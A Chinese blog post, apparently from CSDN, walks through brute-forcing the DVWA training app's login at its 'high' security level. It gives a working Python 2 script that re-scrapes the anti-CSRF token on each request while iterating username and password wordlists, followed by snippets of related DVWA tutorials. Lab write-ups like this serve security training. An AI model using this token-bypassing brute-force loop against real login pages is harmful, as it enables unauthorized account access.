DVWA Brute Force漏洞利用(Security Level : high)

最新推荐文章于 2024-07-15 12:05:52 发布
最新推荐文章于 2024-07-15 12:05:52 发布
阅读量1k 收藏
点赞数
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/zwlww1/article/details/79370974
版权

由于加入了Anti-CSRFtoken预防无脑爆破,这里就不推荐用Burpsuite了,还是简单用python写个脚本吧。

借用lonehand脚本(python 2.7),用户名为admin,对password参数进行爆破并打印结果,但因为版本问题,获取user_token时需要做出相应调整。调整结果如下:(在原基础上修改了TOKEN获取方式,增加了用户名猜解)

from bs4 import BeautifulSoup
import urllib2
header={
    'Host': '192.168.31.119',
    'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0',
    'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
    'Accept-Language': 'en-US,en;q=0.5',
    'Accept-Encoding': 'gzip, deflate',
    'Referer': 'http://192.168.31.119/DVWA-master/vulnerabilities/brute/',
    'Cookie': 'security=high; PHPSESSID=2afb7fbff91b87660e18dcd0ab1d0ea5',
    'Connection': 'close',
    'Upgrade-Insecure-Requests': '1'}
requrl = "http://192.168.31.119/DVWA-master/vulnerabilities/brute/"

def get_token(requrl,header):
    req = urllib2.Request(url=requrl,headers=header)
    response = urllib2.urlopen(req)
    print response.getcode(),
    the_page = response.read()
    print len(the_page)
    soup = BeautifulSoup(the_page,"html.parser")
    d = soup.find_all('input', attrs={'name':'user_token'})
    user_token = d[0].attrs['value']
    return user_token

user_token = get_token(requrl,header)
i=0
for userline in open("user.lst"):
    for line in open("pass.lst"):
        requrl = "http://192.168.31.119/DVWA-master/vulnerabilities/brute/"+"?username="+userline.strip()+"&password="+line.strip()+"&Login=Login&user_token="+user_token
        i = i + 1
        print i,userline.strip(),line.strip(), 
        user_token = get_token(requrl,header)



zwlww1
关注
DVWA靶场练习一—Brute Force
afei001
05-03 428
工具 Burpsuite或者Bruter Bruter下载地址:https://sourceforge.net/projects/worawita/ Brute Force意思是:蛮力、暴力。主要练习暴力破解。 低级(Low Level) 方法一:暴力破解 1.破解登录框 afei 2.使用Burp破解 afei ...
DVWA实验
weixin_43511698的博客
11-27 1199
DVWA实验 一下都是基于low,mid,high级别的实验,为了方便叙述,提前在数据库中建了一个flag表 Brute Force 使用工具 :bp 使用材料:密码字典 bp的四种爆破攻击类型 第一种: Sniper标签 这个是我们最常用的,Sniper是狙击手的意思。这个模式会使用单一的payload【就是导入字典的payload】组。它会针对每个position中$$位置设置payload。这种攻击类型适合对常见漏洞中的请求参数单独地进行测试。攻击中的请求总数应该是position数量和payload
DVWA】--- 一、暴破(BruteForce)
qq_43168364的博客
05-31 1447
BruteForce 一、low 在登录时使用bp进行抓包 将抓到的包发送到Intruder模块。设置需要爆破的参数,和爆破的类型。 这里爆破的类型一共有四种: sniper:一个字典,先匹配第一项再匹配第二项。 Battering ram:一个字典,同用户名同密码匹配。 Pitchfork:两个字典,同行匹配,短的截至。 Cluster bomb:两个字典,交叉匹配所有可能。 一般建议......
burpsuite中intruder标签内attack type四种类型的用法和区别
热门推荐
thatqier
07-24 1万+
brupsuite中intruder标签是经常使用的,今天我就对attack type四种类型的学习写下笔记 第一种:Sniper标签 这个是我们最常用的,Sniper是狙击手的意思。这个模式会使用单一的payload【就是导入字典的payload】组。它会针对每个position中$$位置设置payload。这种攻击类型适合对常见漏洞中的请求参数单独地进行测试。攻击中的请求总数应该是posit
DVWA靶场练习(一)——Brute Force
最新发布
liuzibo1024的博客
07-15 348
暴力破解其实就是利用不同的账户和密码进行多次尝试。因为用户在设置密码时可能会选用比较容易记忆的口令,因此,可以使用一些保存常用密码的字典或者结合用户的个人信息进行爆破。DVWA安全等级有Low,Medium,High和Impossible四种,随着安全等级的提高,网站的防护等级和攻击难度也不断提高。首先将DVWA安全等级设置为了Low。
DVWA SECURITY LEVEL HIGH (python3 brute force)
qq_45106794的博客
11-02 199
import requests from bs4 import BeautifulSoup def getToken(url,header): try: r = requests.get(url,headers=header) print ('响应码:',r.status_code) print ('响应包长度:',len(r.text)) r.raise_for_status(...
DVWABrute Force
baynk的博客
08-22 2697
Brute Force,即暴力(破解),是指黑客利用密码字典,使用穷举法猜解出用户口令。 下面将对四种级别的代码进行分析。 Low 服务器端核心代码 <?php if( isset( $_GET[ 'Login' ] ) ) { // Get username $user = $_GET[ 'username' ]; // Get password $p...
dvwabrute force
qq_39926171的博客
04-30 341
前提:所有爆破都建立在弱口令基础上。 Low: 知道user则可以进行注入。用一下万能密码or 1=1,成功 Medium: 尝试十六进制绕过注入无效,用burpsuite进行爆破即可,失败一次就要等2秒。但不影响爆破 High: 开burpsuite抓包: 知道账号则需要爆破token以及password,爆破模式选择为一对一,也就是pitchfork: password:paylo...
DVWA之蛮力(Brute Force
qq_39682037的博客
03-27 2224
蛮力(Brute Force) 前期准备 这里小编使用的是firefox,打开浏览器,我们在设置里面点开选项,单击网络设置进行配置,如下图
DVWA靶场(通关笔记)
博客
04-25 1837
Brute Force(暴力破解) Command Injection(命令注入) low: Medium: High: CSRF(跨站请求伪造漏洞) File Inclusion(文件包含漏洞) File upload(文件上传漏洞) SQL Injection(SQL注入) union联合查询 报错注入 时间盲注 SQL Injection (Blind)(SQL盲注) 布尔盲注 时间盲注 XSS( Reflected)(xss反射型) XSS(Stored)(x...
[笔记]渗透测试基础 - DVWA1.9
NEWU
11-02 661
暴力破解(Brute Force)演练low/medium:burpsuite方法重放穷举 high:python脚本构造数据包过token impossible: noway命令注入(Command injection)命令注入流程1.是否调用命令? 2.函数或函数的参数是否可控 3.是否拼接注入命令演练low: 127.0.0.1&&net user medium: 127.0.0.
DVWA:该死的易受攻击的Web应用程序(DVWA
02-05
该死的脆弱的网络应用 该死的易受攻击的Web应用程序(DVWA)是该死的易受攻击PHP / MySQL Web应用程序。 其主要目标是帮助安全专业人员在法律环境中测试他们的技能和工具,帮助Web开发人员更好地理解保护Web应用程序的过程,并帮助学生和教师在受控班级中学习Web应用程序安全性。房间环境。 DVWA的目的是通过简单易用的界面来实践一些最常见的Web漏洞,这些漏洞具有不同的难度。 请注意,此软件同时存在已记录和未记录的漏洞。 这是故意的。 鼓励您尝试发现尽可能多的问题。 警告! 该死的漏洞Web应用程序该死的容易受攻击! 请勿将其上传到托管服务提供商的公共html文件夹或任何面向
分布式平台下的HS(High-Security) --非对称加密
weixin_33928467的博客
06-01 101
    非对称加密,在加密和解密的过程中需要不同的密码,即必须具备同时具备两个密码信息才可能获得完整的数据。    图 非对称算法 在非对称算法中,首先得有一个密钥对,这个密钥对含有两部分内容,分别称作公钥(PK)和私钥(SK),公钥通常用来加密,私钥则用来解密。在对称算法中,也讲到了可以有两个密钥(分为加密和解密密钥)。但是,对称算法中的加解密密钥可以互相转换,而在非对称算法中,则不能...
【工具-DVWADVWA渗透系列一:Brute Force
qqchaozai的专栏
10-17 5579
前言 DVWA安装使用介绍,见:【工具-DVWADVWA的安装和使用 本渗透系列包含最新DVWA的14个渗透测试样例: 1.Brute Force(暴力破解)2.Command Injection(命令注入)3.CSRF(跨站请求伪造)4.File Inclusion(文件包含)5.File Uploa...
DVWA-1.9系列操作之Brute Force
fly小灰灰的专栏
01-20 2347
1. Brute Force(暴力破解)模块分析  Brute Force(暴力破解),主要指黑客通过利用密码字典,采用穷举法来进行猜解用户口令,如用户名和用户密码。这也是现在最为广泛的攻击手法之一。   该模块主要功能是输入用户名和用户密码,来进行用户名以及密码的验证。主要页面如图所示:   首先我们把安全级别设置为Low级别。查看源代码:LOW<?php if( isset( $_GET[ '
DVWA暴力破解(Brute Force)——全等级(Low,Medium,High,lmpossible)精讲
Gjqhs的博客
03-07 5898
使用phpstudy搭建渗透测试靶场环境 目录 1.Low级别 2.mediun级别 3.high级别 4.impossible级别 1.Low级别 文件源代码: <?php if( isset( $_GET[ 'Login' ] ) ) { // Get username $user = $_GET[ 'username' ]; // Get password $pass = $_GET[ 'password' ]...
DVWA教程实践之Brute Force
qq_41592596的博客
05-19 677
DVWA教程实践之Brute Force序言原教程原教程环境原教程代码运行运行环境运行问题运行调试解析器问题?编码问题?压缩问题?标签问题?运行结果运行代码总结 序言 最近一段时间在练习DVWA,参考网上的教程练习,在其中遇到了一些问题,在解决问题的过程中栽了一个又一个的坑,最后终于解决,遂写此博客。 原教程 原教程是发表在freebuf上的文章,连接如下: 新手指南:DVWA-1.9全级别教程之Brute Forcehigh级别的教程中,作者采用了编程的方法去爆破密码 原教程环境 此DVWA版本为1.
DVWA sql注入(低中高)
m0_73581247的博客
04-08 444
这样我们就能得到和上面初级一样的内容,接下来的和初级类似。因为这里对一些字符进行了转义,需要使用HEX进行转义。都说手动注入烦,直接sqlmap一把梭哈。偶然发现sqlmap还有解密功能。这里我感觉和第一关差不多。太简单了,只给出代码。我就不抓了直接给代码。
DVWABrute Force
谢公子的博客
08-04 1449
DVWA简介 DVWA(Damn Vulnerable Web Application)是一个用来进行安全脆弱性鉴定的PHP/MySQL Web应用,旨在为安全专业人员测试自己的专业技能和工具提供合法的环境,帮助web开发者更好的理解web应用安全防范的过程。 DVWA共有十个模块,分别是Brute Force(暴力(破解))、Command Injection(命令行注入)、CSRF(跨站请...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值